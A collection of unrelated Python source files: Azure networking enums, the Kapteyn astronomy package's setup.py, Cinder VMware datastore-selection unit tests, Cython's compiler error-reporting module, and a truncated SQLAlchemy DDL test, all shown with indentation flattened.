class VirtualNetworkGatewayConnectionStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Virtual network Gateway connection status
"""
UNKNOWN = "Unknown"
CONNECTING = "Connecting"
CONNECTED = "Connected"
NOT_CONNECTED = "NotConnected"
class VirtualNetworkGatewayConnectionType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Gateway connection type. Possible values are: 'Ipsec','Vnet2Vnet','ExpressRoute', and
'VPNClient.
"""
I_PSEC = "IPsec"
VNET2_VNET = "Vnet2Vnet"
EXPRESS_ROUTE = "ExpressRoute"
VPN_CLIENT = "VPNClient"
class VirtualNetworkGatewaySkuName(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Gateway SKU name.
"""
BASIC = "Basic"
HIGH_PERFORMANCE = "HighPerformance"
STANDARD = "Standard"
ULTRA_PERFORMANCE = "UltraPerformance"
VPN_GW1 = "VpnGw1"
VPN_GW2 = "VpnGw2"
VPN_GW3 = "VpnGw3"
VPN_GW1_AZ = "VpnGw1AZ"
VPN_GW2_AZ = "VpnGw2AZ"
VPN_GW3_AZ = "VpnGw3AZ"
ER_GW1_AZ = "ErGw1AZ"
ER_GW2_AZ = "ErGw2AZ"
ER_GW3_AZ = "ErGw3AZ"
class VirtualNetworkGatewaySkuTier(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Gateway SKU tier.
"""
BASIC = "Basic"
HIGH_PERFORMANCE = "HighPerformance"
STANDARD = "Standard"
ULTRA_PERFORMANCE = "UltraPerformance"
VPN_GW1 = "VpnGw1"
VPN_GW2 = "VpnGw2"
VPN_GW3 = "VpnGw3"
VPN_GW1_AZ = "VpnGw1AZ"
VPN_GW2_AZ = "VpnGw2AZ"
VPN_GW3_AZ = "VpnGw3AZ"
ER_GW1_AZ = "ErGw1AZ"
ER_GW2_AZ = "ErGw2AZ"
ER_GW3_AZ = "ErGw3AZ"
class VirtualNetworkGatewayType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The type of this virtual network gateway. Possible values are: 'Vpn' and 'ExpressRoute'.
"""
VPN = "Vpn"
EXPRESS_ROUTE = "ExpressRoute"
class VirtualNetworkPeeringState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The status of the virtual network peering. Possible values are 'Initiated', 'Connected', and
'Disconnected'.
"""
INITIATED = "Initiated"
CONNECTED = "Connected"
DISCONNECTED = "Disconnected"
class VirtualWanSecurityProviderType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The virtual wan security provider type.
"""
EXTERNAL = "External"
NATIVE = "Native"
class VpnClientProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""VPN client protocol enabled for the virtual network gateway.
"""
IKE_V2 = "IkeV2"
SSTP = "SSTP"
OPEN_VPN = "OpenVPN"
class VpnConnectionStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The current state of the vpn connection.
"""
UNKNOWN = "Unknown"
CONNECTING = "Connecting"
CONNECTED = "Connected"
NOT_CONNECTED = "NotConnected"
class VpnGatewayTunnelingProtocol(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""VPN protocol enabled for the P2SVpnServerConfiguration.
"""
IKE_V2 = "IkeV2"
OPEN_VPN = "OpenVPN"
class VpnType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The type of this virtual network gateway. Possible values are: 'PolicyBased' and 'RouteBased'.
"""
POLICY_BASED = "PolicyBased"
ROUTE_BASED = "RouteBased"
|
|
from setuptools import setup, Extension
import sys
sys.path.insert(0, ".")
from kapteyn import __version__ as version
from glob import glob
import sys, os
# from https://github.com/msabramo/cython-test/
# get cython before running setup(..)
#from setuptools.dist import Distribution
#Distribution(dict(setup_requires='Cython'))
try:
import numpy
except:
print('''
-- Error.
The Kapteyn Package requires NumPy, which seems to be unavailable here.
Please check your Python installation.
''')
sys.exit(1)
try:
wcslib_dir = glob('src/wcslib*/C/')[0]
except:
print('''
-- Error.
Unable to find WCSLIB source distribution.
''')
sys.exit(1)
include_dirs = []
numdir = os.path.dirname(numpy.__file__)
ipath = os.path.join(numdir, numpy.get_include())
include_dirs.append(ipath)
include_dirs.append('src')
include_dirs.append(wcslib_dir)
short_descr = "Kapteyn Package: Python modules for astronomical applications"
description = """The Kapteyn Package is a collection of Python modules
and applications developed by the computer group of the Kapteyn
Astronomical Institute, University of Groningen, The Netherlands. The
purpose of the package is to provide tools for the development of
astronomical applications with Python.
The package is suitable for both inexperienced and experienced users and
developers and documentation is provided for both groups. The
documentation also provides in-depth chapters about celestial
transformations, spectral translations and non-linear least squares fitting.
The package's most important features:
* The handling of spatial and spectral coordinates, WCS projections
and transformations between different sky systems. Spectral
translations (e.g., between frequencies and velocities) are supported
and also mixed coordinates. (Modules wcs and celestial, Module wcs
uses Mark Calabretta's WCSLIB which is distributed with the package.)
* Versatile tools for writing small and dedicated applications for
the inspection of FITS headers, the extraction and display of (FITS)
data, interactive inspection of this data (color editing) and for the
creation of plots with world coordinate information. (Module maputils)
As one example, a gallery of all-sky plots is provided.
* A class for the efficient reading, writing and manipulating simple
table-like structures in text files. (Module tabarray)
* Utilities for use with matplotlib such as obtaining coordinate
information from plots, interactively modifiable colormaps and timer
events (module mplutil); tools for parsing and interpreting coordinate
information entered by the user (module positions).
* A function to search for gaussian components in a profile (module
profiles) and a class for non-linear least squares curve fitting
(module kmpfit)"""
classifiers = [
['Development Status :: 5 - Production/Stable',
'Development Status :: 4 - Beta'][int('b' in version)],
'Programming Language :: Python',
'Programming Language :: Cython',
'Programming Language :: C',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Astronomy',
'Topic :: Scientific/Engineering :: Visualization',
'Topic :: Scientific/Engineering :: Mathematics',
'License :: OSI Approved :: BSD License',
'License :: OSI Approved :: GNU Library or Lesser General Public License (LGPL)',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows'
]
download_url = "http://www.astro.rug.nl/software/kapteyn/kapteyn-%s.tar.gz" % version
wcsmod_src = [
"eterms.c",
"wcs.pyx",
"xyz.c"
]
wcslib_src = [
"cel.c",
"lin.c",
"log.c",
"prj.c",
"spc.c",
"sph.c",
"spx.c",
"tab.c",
"wcs.c",
"wcsfix.c",
"wcshdr.c",
"wcsprintf.c",
"wcstrig.c",
"wcsunits.c",
"wcsutil.c",
"wcserr.c",
"flexed/wcsulex.c",
"flexed/wcsutrn.c"
]
ndimg_src = [
"nd_image.c",
"ni_filters.c",
"ni_fourier.c",
"ni_interpolation.c",
"ni_measure.c",
"ni_morphology.c",
"ni_support.c",
]
wcs_src = ( ['src/' + source for source in wcsmod_src]
+ [wcslib_dir + source for source in wcslib_src] )
_nd_image_src = ['src/ndimg/' + source for source in ndimg_src]
define_macros = []
# MS Windows adjustments
#
if sys.platform == 'win32':
define_macros.append(('YY_NO_UNISTD_H', None))
define_macros.append(('_CRT_SECURE_NO_WARNINGS', None))
# avoid using buggy Apple compiler
#
if sys.platform=='darwin':
from distutils import ccompiler
import subprocess
import re
c = ccompiler.new_compiler()
process = subprocess.Popen(c.compiler+['--version'], stdout=subprocess.PIPE)
output = process.communicate()[0].strip()
version = output.split()[0].decode("ascii")
if re.match('i686-apple-darwin[0-9]*-llvm-gcc-4.2', version):
os.environ['CC'] = 'clang'
class lazy_cythonize(list):
def __init__(self, callback):
self._list, self.callback = None, callback
def c_list(self):
if self._list is None: self._list = self.callback()
return self._list
def __iter__(self):
for e in self.c_list(): yield e
def __getitem__(self, ii): return self.c_list()[ii]
def __len__(self): return len(self.c_list())
def extensions():
from Cython.Build import cythonize
extensions = [
Extension(
"wcs", wcs_src,
include_dirs=include_dirs,
define_macros=define_macros
),
Extension(
"ascarray",
["src/ascarray.pyx"],
include_dirs=include_dirs
),
Extension(
"profiles",
["src/profiles.pyx", "src/gauestd.c"],
include_dirs=include_dirs
),
Extension(
"_nd_image", _nd_image_src,
include_dirs=include_dirs
),
Extension(
"kmpfit",
["src/kmpfit.pyx", "src/mpfit.c"],
include_dirs=include_dirs
),
]
return cythonize(extensions)
setup(
name="kapteyn",
version=version,
description=short_descr,
author='J.P. Terlouw, M.G.R. Vogelaar, M.A. Breddels',
author_email='gipsy@astro.rug.nl',
url='http://www.astro.rug.nl/software/kapteyn/',
download_url = download_url,
long_description=description,
platforms = ['Linux', 'Mac OSX', 'Windows'],
license = 'BSD',
setup_requires=["Cython", "numpy"],
install_requires=["Cython", "numpy", "six"],
classifiers = classifiers,
ext_package='kapteyn',
ext_modules=lazy_cythonize(extensions),
package_dir={'kapteyn': 'kapteyn'},
packages=['kapteyn'],
package_data={'kapteyn': ['lut/*.lut']},
)
""""""
|
|
# Copyright (c) 2014 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit tests for datastore module.
"""
import mock
from oslo_utils import units
from oslo_vmware import exceptions
from cinder import test
from cinder.volume.drivers.vmware import datastore as ds_sel
from cinder.volume.drivers.vmware import exceptions as vmdk_exceptions
class DatastoreTest(test.TestCase):
"""Unit tests for Datastore."""
def setUp(self):
super(DatastoreTest, self).setUp()
self._session = mock.Mock()
self._vops = mock.Mock()
self._ds_sel = ds_sel.DatastoreSelector(self._vops, self._session)
@mock.patch('oslo_vmware.pbm.get_profile_id_by_name')
def test_get_profile_id(self, get_profile_id_by_name):
profile_id = mock.sentinel.profile_id
get_profile_id_by_name.return_value = profile_id
profile_name = mock.sentinel.profile_name
self.assertEqual(profile_id, self._ds_sel.get_profile_id(profile_name))
get_profile_id_by_name.assert_called_once_with(self._session,
profile_name)
@mock.patch('oslo_vmware.pbm.get_profile_id_by_name')
def test_get_profile_id_with_invalid_profile(self, get_profile_id_by_name):
get_profile_id_by_name.return_value = None
profile_name = mock.sentinel.profile_name
self.assertRaises(vmdk_exceptions.ProfileNotFoundException,
self._ds_sel.get_profile_id,
profile_name)
get_profile_id_by_name.assert_called_once_with(self._session,
profile_name)
def _create_datastore(self, moref):
return mock.Mock(value=moref)
def _create_summary(
self, ds, free_space=units.Mi, _type=ds_sel.DatastoreType.VMFS,
capacity=2 * units.Mi):
return mock.Mock(datastore=ds, freeSpace=free_space, type=_type,
capacity=capacity)
def _create_host(self, value):
host = mock.Mock(spec=['_type', 'value'])
host._type = 'HostSystem'
host.value = value
return host
@mock.patch('cinder.volume.drivers.vmware.datastore.DatastoreSelector.'
'_filter_by_profile')
def test_filter_datastores(self, filter_by_profile):
# Test with empty datastore list.
datastores = []
size_bytes = 2 * units.Mi
profile_id = mock.sentinel.profile_id
hard_anti_affinity_datastores = None
hard_affinity_ds_types = None
self.assertEqual([], self._ds_sel._filter_datastores(
datastores, size_bytes, profile_id, hard_anti_affinity_datastores,
hard_affinity_ds_types))
# Test with single datastore with hard anti-affinity.
ds_1 = self._create_datastore('ds-1')
datastores = [ds_1]
hard_anti_affinity_datastores = [ds_1.value]
self.assertEqual([], self._ds_sel._filter_datastores(
datastores, size_bytes, profile_id, hard_anti_affinity_datastores,
hard_affinity_ds_types))
# Extend previous case with a profile non-compliant datastore.
ds_2 = self._create_datastore('ds-2')
datastores.append(ds_2)
filter_by_profile.return_value = []
self.assertEqual([], self._ds_sel._filter_datastores(
datastores, size_bytes, profile_id, hard_anti_affinity_datastores,
hard_affinity_ds_types))
filter_by_profile.assert_called_once_with([ds_2], profile_id)
# Extend previous case with a less free space datastore.
ds_3 = self._create_datastore('ds-3')
datastores.append(ds_3)
filter_by_profile.return_value = [ds_3]
free_space_list = [units.Mi]
type_list = [ds_sel.DatastoreType.NFS]
self._vops.get_summary.side_effect = (
lambda ds: self._create_summary(ds,
free_space_list.pop(0),
type_list.pop(0)))
self.assertEqual([], self._ds_sel._filter_datastores(
datastores, size_bytes, profile_id, hard_anti_affinity_datastores,
hard_affinity_ds_types))
# Extend previous case with a datastore not satisfying hard affinity
# datastore type requirement.
ds_4 = self._create_datastore('ds-4')
datastores.append(ds_4)
filter_by_profile.return_value = [ds_3, ds_4]
free_space_list = [units.Mi, 4 * units.Mi]
type_list = [ds_sel.DatastoreType.NFS, ds_sel.DatastoreType.VSAN]
hard_affinity_ds_types = [ds_sel.DatastoreType.NFS]
self.assertEqual([], self._ds_sel._filter_datastores(
datastores, size_bytes, profile_id, hard_anti_affinity_datastores,
hard_affinity_ds_types))
# Modify the previous case to remove hard affinity datastore type
# requirement.
free_space_list = [units.Mi, 4 * units.Mi]
type_list = [ds_sel.DatastoreType.NFS, ds_sel.DatastoreType.VSAN]
hard_affinity_ds_types = None
res = self._ds_sel._filter_datastores(
datastores, size_bytes, profile_id, hard_anti_affinity_datastores,
hard_affinity_ds_types)
self.assertTrue(len(res) == 1)
self.assertEqual(ds_4, res[0].datastore)
# Extend the previous case by adding a datastore satisfying
# hard affinity datastore type requirement.
ds_5 = self._create_datastore('ds-5')
datastores.append(ds_5)
filter_by_profile.return_value = [ds_3, ds_4, ds_5]
free_space_list = [units.Mi, 4 * units.Mi, 5 * units.Mi]
type_list = [ds_sel.DatastoreType.NFS, ds_sel.DatastoreType.VSAN,
ds_sel.DatastoreType.VMFS]
hard_affinity_ds_types = [ds_sel.DatastoreType.VMFS]
res = self._ds_sel._filter_datastores(
datastores, size_bytes, profile_id, hard_anti_affinity_datastores,
hard_affinity_ds_types)
self.assertTrue(len(res) == 1)
self.assertEqual(ds_5, res[0].datastore)
# Modify the previous case to have two datastores satisfying
# hard affinity datastore type requirement.
free_space_list = [units.Mi, 4 * units.Mi, 5 * units.Mi]
type_list = [ds_sel.DatastoreType.NFS, ds_sel.DatastoreType.VSAN,
ds_sel.DatastoreType.VSAN]
hard_affinity_ds_types = [ds_sel.DatastoreType.VSAN]
res = self._ds_sel._filter_datastores(
datastores, size_bytes, profile_id, hard_anti_affinity_datastores,
hard_affinity_ds_types)
self.assertTrue(len(res) == 2)
self.assertEqual(ds_4, res[0].datastore)
self.assertEqual(ds_5, res[1].datastore)
# Clear side effects.
self._vops.get_summary.side_effect = None
def test_select_best_summary(self):
# No tie-- all datastores with different host mount count.
summary_1 = self._create_summary(mock.sentinel.ds_1,
free_space=units.Mi,
capacity=2 * units.Mi)
summary_2 = self._create_summary(mock.sentinel.ds_2,
free_space=units.Mi,
capacity=3 * units.Mi)
summary_3 = self._create_summary(mock.sentinel.ds_3,
free_space=units.Mi,
capacity=4 * units.Mi)
host_1 = self._create_host('host-1')
host_2 = self._create_host('host-2')
host_3 = self._create_host('host-3')
connected_hosts = {mock.sentinel.ds_1: [host_1.value],
mock.sentinel.ds_2: [host_1.value, host_2.value],
mock.sentinel.ds_3: [host_1.value, host_2.value,
host_3.value]}
self._vops.get_connected_hosts.side_effect = (
lambda summary: connected_hosts[summary])
summaries = [summary_1, summary_2, summary_3]
(best_summary, best_utilization) = self._ds_sel._select_best_summary(
summaries)
self.assertEqual(summary_3, best_summary)
self.assertEqual(3 / 4.0, best_utilization)
# Tie-- two datastores with max host mount count.
summary_4 = self._create_summary(mock.sentinel.ds_4,
free_space=2 * units.Mi,
capacity=4 * units.Mi)
connected_hosts[mock.sentinel.ds_4] = (
connected_hosts[mock.sentinel.ds_3])
summaries.append(summary_4)
(best_summary, best_utilization) = self._ds_sel._select_best_summary(
summaries)
self.assertEqual(summary_4, best_summary)
self.assertEqual(1 / 2.0, best_utilization)
# Clear side effects.
self._vops.get_connected_hosts.side_effect = None
@mock.patch('cinder.volume.drivers.vmware.datastore.DatastoreSelector.'
'get_profile_id')
@mock.patch('cinder.volume.drivers.vmware.datastore.DatastoreSelector.'
'_filter_datastores')
def test_select_datastore(self, filter_datastores, get_profile_id):
# Test with no hosts.
size_bytes = units.Ki
req = {self._ds_sel.SIZE_BYTES: size_bytes}
self._vops.get_hosts.return_value = mock.Mock(objects=[])
self.assertEqual((), self._ds_sel.select_datastore(req))
self._vops.get_hosts.assert_called_once_with()
# Test with single host with no valid datastores.
host_1 = self._create_host('host-1')
self._vops.get_hosts.return_value = mock.Mock(
objects=[mock.Mock(obj=host_1)])
self._vops.continue_retrieval.return_value = None
self._vops.get_dss_rp.side_effect = exceptions.VimException('error')
self.assertEqual((), self._ds_sel.select_datastore(req))
self._vops.get_dss_rp.assert_called_once_with(host_1)
# Test with three hosts and vCenter connection problem while fetching
# datastores for the second host.
self._vops.get_dss_rp.reset_mock()
host_2 = self._create_host('host-2')
host_3 = self._create_host('host-3')
self._vops.get_hosts.return_value = mock.Mock(
objects=[mock.Mock(obj=host_1),
mock.Mock(obj=host_2),
mock.Mock(obj=host_3)])
self._vops.get_dss_rp.side_effect = [
exceptions.VimException('no valid datastores'),
exceptions.VimConnectionException('connection error')]
self.assertRaises(exceptions.VimConnectionException,
self._ds_sel.select_datastore,
req)
get_dss_rp_exp_calls = [mock.call(host_1), mock.call(host_2)]
self.assertEqual(get_dss_rp_exp_calls,
self._vops.get_dss_rp.call_args_list)
# Modify previous case to return datastores for second and third host,
# where none of them meet the requirements which include a storage
# profile and affinity requirements.
aff_ds_types = [ds_sel.DatastoreType.VMFS]
req[ds_sel.DatastoreSelector.HARD_AFFINITY_DS_TYPE] = aff_ds_types
ds_1a = mock.sentinel.ds_1a
anti_affinity_ds = [ds_1a]
req[ds_sel.DatastoreSelector.HARD_ANTI_AFFINITY_DS] = anti_affinity_ds
profile_name = mock.sentinel.profile_name
req[ds_sel.DatastoreSelector.PROFILE_NAME] = profile_name
profile_id = mock.sentinel.profile_id
get_profile_id.return_value = profile_id
ds_2a = mock.sentinel.ds_2a
ds_2b = mock.sentinel.ds_2b
ds_3a = mock.sentinel.ds_3a
self._vops.get_dss_rp.reset_mock()
rp_2 = mock.sentinel.rp_2
rp_3 = mock.sentinel.rp_3
self._vops.get_dss_rp.side_effect = [
exceptions.VimException('no valid datastores'),
([ds_2a, ds_2b], rp_2),
([ds_3a], rp_3)]
filter_datastores.return_value = []
self.assertEqual((), self._ds_sel.select_datastore(req))
get_profile_id.assert_called_once_with(profile_name)
get_dss_rp_exp_calls.append(mock.call(host_3))
self.assertEqual(get_dss_rp_exp_calls,
self._vops.get_dss_rp.call_args_list)
filter_datastores_exp_calls = [
mock.call([ds_2a, ds_2b], size_bytes, profile_id, anti_affinity_ds,
aff_ds_types),
mock.call([ds_3a], size_bytes, profile_id, anti_affinity_ds,
aff_ds_types)]
self.assertEqual(filter_datastores_exp_calls,
filter_datastores.call_args_list)
# Modify previous case to have a non-empty summary list after filtering
# with preferred utilization threshold unset.
self._vops.get_dss_rp.side_effect = [
exceptions.VimException('no valid datastores'),
([ds_2a, ds_2b], rp_2),
([ds_3a], rp_3)]
summary_2b = self._create_summary(ds_2b, free_space=0.5 * units.Mi,
capacity=units.Mi)
filter_datastores.side_effect = [[summary_2b]]
self._vops.get_connected_hosts.return_value = [host_1]
self.assertEqual((host_2, rp_2, summary_2b),
self._ds_sel.select_datastore(req))
# Modify previous case to have a preferred utilization threshold
# satsified by one datastore.
self._vops.get_dss_rp.side_effect = [
exceptions.VimException('no valid datastores'),
([ds_2a, ds_2b], rp_2),
([ds_3a], rp_3)]
req[ds_sel.DatastoreSelector.PREF_UTIL_THRESH] = 0.4
summary_3a = self._create_summary(ds_3a, free_space=0.7 * units.Mi,
capacity=units.Mi)
filter_datastores.side_effect = [[summary_2b], [summary_3a]]
self.assertEqual((host_3, rp_3, summary_3a),
self._ds_sel.select_datastore(req))
# Modify previous case to have a preferred utilization threshold
# which cannot be satisfied.
self._vops.get_dss_rp.side_effect = [
exceptions.VimException('no valid datastores'),
([ds_2a, ds_2b], rp_2),
([ds_3a], rp_3)]
filter_datastores.side_effect = [[summary_2b], [summary_3a]]
req[ds_sel.DatastoreSelector.PREF_UTIL_THRESH] = 0.2
summary_2b.freeSpace = 0.75 * units.Mi
self.assertEqual((host_2, rp_2, summary_2b),
self._ds_sel.select_datastore(req))
# Clear side effects.
self._vops.get_dss_rp.side_effect = None
@mock.patch('cinder.volume.drivers.vmware.datastore.DatastoreSelector.'
'_filter_datastores')
def test_select_datastore_with_single_host(self, filter_datastores):
host = self._create_host('host-1')
req = {self._ds_sel.SIZE_BYTES: units.Gi}
ds = mock.sentinel.ds
rp = mock.sentinel.rp
self._vops.get_dss_rp.return_value = ([ds], rp)
summary = self._create_summary(ds, free_space=2 * units.Gi,
capacity=3 * units.Gi)
filter_datastores.return_value = [summary]
self._vops.get_connected_hosts.return_value = [host.value]
self.assertEqual((host, rp, summary),
self._ds_sel.select_datastore(req, [host]))
# reset mocks
self._vops.get_dss_rp.reset_mock()
self._vops.get_dss_rp.return_value = None
self._vops.get_connected_hosts.reset_mock()
self._vops.get_connected_hosts.return_value = None
def test_select_datastore_with_empty_host_list(self):
size_bytes = units.Ki
req = {self._ds_sel.SIZE_BYTES: size_bytes}
self._vops.get_hosts.return_value = mock.Mock(objects=[])
self.assertEqual((), self._ds_sel.select_datastore(req, hosts=[]))
self._vops.get_hosts.assert_called_once_with()
@mock.patch('oslo_vmware.pbm.get_profile_id_by_name')
@mock.patch('cinder.volume.drivers.vmware.datastore.DatastoreSelector.'
'_filter_by_profile')
def test_is_datastore_compliant(self, filter_by_profile,
get_profile_id_by_name):
# Test with empty profile.
profile_name = None
datastore = mock.sentinel.datastore
self.assertTrue(self._ds_sel.is_datastore_compliant(datastore,
profile_name))
# Test with invalid profile.
profile_name = mock.sentinel.profile_name
get_profile_id_by_name.return_value = None
self.assertRaises(vmdk_exceptions.ProfileNotFoundException,
self._ds_sel.is_datastore_compliant,
datastore,
profile_name)
get_profile_id_by_name.assert_called_once_with(self._session,
profile_name)
# Test with valid profile and non-compliant datastore.
get_profile_id_by_name.reset_mock()
profile_id = mock.sentinel.profile_id
get_profile_id_by_name.return_value = profile_id
filter_by_profile.return_value = []
self.assertFalse(self._ds_sel.is_datastore_compliant(datastore,
profile_name))
get_profile_id_by_name.assert_called_once_with(self._session,
profile_name)
filter_by_profile.assert_called_once_with([datastore], profile_id)
# Test with valid profile and compliant datastore.
get_profile_id_by_name.reset_mock()
filter_by_profile.reset_mock()
filter_by_profile.return_value = [datastore]
self.assertTrue(self._ds_sel.is_datastore_compliant(datastore,
profile_name))
get_profile_id_by_name.assert_called_once_with(self._session,
profile_name)
filter_by_profile.assert_called_once_with([datastore], profile_id)
def test_get_all_hosts(self):
host_1 = self._create_host('host-1')
host_2 = self._create_host('host-2')
hosts = mock.Mock(objects=[mock.Mock(obj=host_1),
mock.Mock(obj=host_2)])
self._vops.get_hosts.return_value = hosts
self._vops.continue_retrieval.return_value = None
# host_1 is usable and host_2 is not usable
self._vops.is_host_usable.side_effect = [True, False]
ret = self._ds_sel._get_all_hosts()
self.assertEqual([host_1], ret)
self._vops.get_hosts.assert_called_once_with()
self._vops.continue_retrieval.assert_called_once_with(hosts)
exp_calls = [mock.call(host_1), mock.call(host_2)]
self.assertEqual(exp_calls, self._vops.is_host_usable.call_args_list)
|
|
#
# Errors
#
from __future__ import absolute_import
try:
from __builtin__ import basestring as any_string_type
except ImportError:
any_string_type = (bytes, str)
import sys
from contextlib import contextmanager
from ..Utils import open_new_file
from . import DebugFlags
from . import Options
class PyrexError(Exception):
pass
class PyrexWarning(Exception):
pass
def context(position):
source = position[0]
assert not (isinstance(source, any_string_type)), (
"Please replace filename strings with Scanning.FileSourceDescriptor instances %r" % source)
try:
F = source.get_lines()
except UnicodeDecodeError:
# file has an encoding problem
s = u"[unprintable code]\n"
else:
s = u''.join(F[max(0, position[1]-6):position[1]])
s = u'...\n%s%s^\n' % (s, u' '*(position[2]-1))
s = u'%s\n%s%s\n' % (u'-'*60, s, u'-'*60)
return s
def format_position(position):
if position:
return u"%s:%d:%d: " % (position[0].get_error_description(),
position[1], position[2])
return u''
def format_error(message, position):
if position:
pos_str = format_position(position)
cont = context(position)
message = u'\nError compiling Cython file:\n%s\n%s%s' % (cont, pos_str, message or u'')
return message
class CompileError(PyrexError):
def __init__(self, position = None, message = u""):
self.position = position
self.message_only = message
self.formatted_message = format_error(message, position)
self.reported = False
# Deprecated and withdrawn in 2.6:
# self.message = message
Exception.__init__(self, self.formatted_message)
# Python Exception subclass pickling is broken,
# see http://bugs.python.org/issue1692335
self.args = (position, message)
def __str__(self):
return self.formatted_message
class CompileWarning(PyrexWarning):
def __init__(self, position = None, message = ""):
self.position = position
# Deprecated and withdrawn in 2.6:
# self.message = message
Exception.__init__(self, format_position(position) + message)
class InternalError(Exception):
# If this is ever raised, there is a bug in the compiler.
def __init__(self, message):
self.message_only = message
Exception.__init__(self, u"Internal compiler error: %s"
% message)
class AbortError(Exception):
# Throw this to stop the compilation immediately.
def __init__(self, message):
self.message_only = message
Exception.__init__(self, u"Abort error: %s" % message)
class CompilerCrash(CompileError):
# raised when an unexpected exception occurs in a transform
def __init__(self, pos, context, message, cause, stacktrace=None):
if message:
message = u'\n' + message
else:
message = u'\n'
self.message_only = message
if context:
message = u"Compiler crash in %s%s" % (context, message)
if stacktrace:
import traceback
message += (
u'\n\nCompiler crash traceback from this point on:\n' +
u''.join(traceback.format_tb(stacktrace)))
if cause:
if not stacktrace:
message += u'\n'
message += u'%s: %s' % (cause.__class__.__name__, cause)
CompileError.__init__(self, pos, message)
# Python Exception subclass pickling is broken,
# see http://bugs.python.org/issue1692335
self.args = (pos, context, message, cause, stacktrace)
class NoElementTreeInstalledException(PyrexError):
"""raised when the user enabled options.gdb_debug but no ElementTree
implementation was found
"""
listing_file = None
num_errors = 0
echo_file = None
def open_listing_file(path, echo_to_stderr = 1):
# Begin a new error listing. If path is None, no file
# is opened, the error counter is just reset.
global listing_file, num_errors, echo_file
if path is not None:
listing_file = open_new_file(path)
else:
listing_file = None
if echo_to_stderr:
echo_file = sys.stderr
else:
echo_file = None
num_errors = 0
def close_listing_file():
global listing_file
if listing_file:
listing_file.close()
listing_file = None
def report_error(err, use_stack=True):
if error_stack and use_stack:
error_stack[-1].append(err)
else:
global num_errors
# See Main.py for why dual reporting occurs. Quick fix for now.
if err.reported: return
err.reported = True
try: line = u"%s\n" % err
except UnicodeEncodeError:
# Python <= 2.5 does this for non-ASCII Unicode exceptions
line = format_error(getattr(err, 'message_only', "[unprintable exception message]"),
getattr(err, 'position', None)) + u'\n'
if listing_file:
try: listing_file.write(line)
except UnicodeEncodeError:
listing_file.write(line.encode('ASCII', 'replace'))
if echo_file:
try: echo_file.write(line)
except UnicodeEncodeError:
echo_file.write(line.encode('ASCII', 'replace'))
num_errors += 1
if Options.fast_fail:
raise AbortError("fatal errors")
def error(position, message):
#print("Errors.error:", repr(position), repr(message)) ###
if position is None:
raise InternalError(message)
err = CompileError(position, message)
if DebugFlags.debug_exception_on_error: raise Exception(err) # debug
report_error(err)
return err
LEVEL = 1 # warn about all errors level 1 or higher
def message(position, message, level=1):
if level < LEVEL:
return
warn = CompileWarning(position, message)
line = "note: %s\n" % warn
if listing_file:
listing_file.write(line)
if echo_file:
echo_file.write(line)
return warn
def warning(position, message, level=0):
if level < LEVEL:
return
if Options.warning_errors and position:
return error(position, message)
warn = CompileWarning(position, message)
line = "warning: %s\n" % warn
if listing_file:
listing_file.write(line)
if echo_file:
echo_file.write(line)
return warn
_warn_once_seen = {}
def warn_once(position, message, level=0):
if level < LEVEL or message in _warn_once_seen:
return
warn = CompileWarning(position, message)
line = "warning: %s\n" % warn
if listing_file:
listing_file.write(line)
if echo_file:
echo_file.write(line)
_warn_once_seen[message] = True
return warn
# These functions can be used to momentarily suppress errors.
error_stack = []
def hold_errors():
error_stack.append([])
def release_errors(ignore=False):
held_errors = error_stack.pop()
if not ignore:
for err in held_errors:
report_error(err)
def held_errors():
return error_stack[-1]
# same as context manager:
@contextmanager
def local_errors(ignore=False):
errors = []
error_stack.append(errors)
try:
yield errors
finally:
release_errors(ignore=ignore)
# this module needs a redesign to support parallel cythonisation, but
# for now, the following works at least in sequential compiler runs
def reset():
_warn_once_seen.clear()
del error_stack[:]
|
|
from sqlalchemy import Column
from sqlalchemy import ForeignKey
from sqlalchemy import Index
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import schema
from sqlalchemy import Sequence
from sqlalchemy import Table
from sqlalchemy.sql.ddl import SchemaDropper
from sqlalchemy.sql.ddl import SchemaGenerator
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.mock import Mock
class EmitDDLTest(fixtures.TestBase):
def _mock_connection(self, item_exists):
def has_item(connection, name, schema):
return item_exists(name)
def has_index(connection, tablename, idxname, schema):
return item_exists(idxname)
return Mock(
dialect=Mock(
supports_sequences=True,
has_table=Mock(side_effect=has_item),
has_sequence=Mock(side_effect=has_item),
has_index=Mock(side_effect=has_index),
supports_comments=True,
inline_comments=False,
),
_schema_translate_map=None,
)
def _mock_create_fixture(
self, checkfirst, tables, item_exists=lambda item: False
):
connection = self._mock_connection(item_exists)
return SchemaGenerator(
connection.dialect,
connection,
checkfirst=checkfirst,
tables=tables,
)
def _mock_drop_fixture(
self, checkfirst, tables, item_exists=lambda item: True
):
connection = self._mock_connection(item_exists)
return SchemaDropper(
connection.dialect,
connection,
checkfirst=checkfirst,
tables=tables,
)
def _table_fixture(self):
m = MetaData()
return (m,) + tuple(
Table("t%d" % i, m, Column("x", Integer)) for i in range(1, 6)
)
def _use_alter_fixture_one(self):
m = MetaData()
t1 = Table(
"t1",
m,
Column("id", Integer, primary_key=True),
Column("t2id", Integer, ForeignKey("t2.id")),
)
t2 = Table(
"t2",
m,
